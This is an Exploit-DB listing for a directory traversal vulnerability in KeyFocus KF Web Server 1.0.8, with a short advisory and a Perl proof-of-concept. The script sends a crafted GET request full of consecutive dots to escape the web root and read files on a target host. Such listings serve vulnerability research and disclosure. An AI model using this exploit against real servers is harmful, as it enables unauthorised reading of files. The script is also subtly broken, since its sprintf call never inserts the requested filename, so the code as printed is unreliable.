Lucene search

K
exploitdbMattmurphyEDB-ID:22018
HistoryNov 13, 2002 - 12:00 a.m.

Key Focus KF Web Server 1.0.8 - Directory Traversal

2002-11-1300:00:00
mattmurphy
www.exploit-db.com
25

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/6180/info

KeyFocus KF Web Server is vulnerable to a directory traversal attack. This is due to the web server's inability to properly handle file names containing consecutive dot characters. By exploiting this vulnerability, an attacker is able to break out of the web root and retrieve any file readable by the web server. Only files of recognized MIME types can be retrieved. 

#!/usr/bin/perl
use URI::Escape;
use IO::Socket;
if (@ARGV < 2) {
print STDOUT "Usage: perl $0 [filename] [host] [port]";
} else {
$f =
IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp");
$url = uri_escape($ARGV[0]);
$exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n");
print $f $exploit;
undef $f;
}

AI Score

7.4

Confidence

Low

Related for EDB-ID:22018